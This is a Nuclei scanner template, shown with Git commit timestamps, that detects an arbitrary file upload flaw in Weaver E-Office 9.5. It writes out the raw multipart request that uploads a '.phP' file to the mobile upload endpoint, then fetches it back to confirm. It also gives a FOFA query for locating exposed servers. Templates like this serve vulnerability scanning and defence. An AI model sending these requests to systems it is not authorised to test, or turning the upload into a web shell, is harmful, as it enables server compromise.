nuclei-templates/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload....

62 lines
1.9 KiB
YAML
Raw Normal View History

2023-09-05 07:47:45 +00:00
id: weaver-eoffice-file-upload
info:
name: Weaver E-Office v9.5 - Arbitrary File Upload
author: princechaddha
severity: high
description: |
Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
reference:
- https://github.com/RCEraser/cve/blob/main/Weaver.md
2023-09-06 09:49:36 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2023-09-06 09:49:36 +00:00
fofa-query: app="泛微-EOffice"
tags: e-office,weaver,intrusive,file-upload
2023-09-05 07:47:45 +00:00
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="{{filename}}.phP"
Content-Type: image/jpeg
{{randstr}}
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
- |
GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
2023-10-14 11:27:55 +00:00
2023-09-05 07:47:45 +00:00
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{randstr}}'
extractors:
- type: regex
name: id
part: body
group: 1
internal: true
regex:
- '\\\/attachment\\\/([0-9]+)\\\/'
# digest: 4b0a00483046022100cb2ea659985e0e6a70be38ce3127d612a7bb63b072df2cb43e4efe695bd304b0022100d305f452c2f830e004937b472bc867c5d0e8feab8e0846a113a5d8a5e163c33b:922c64590222798bb761d5b6d8e72950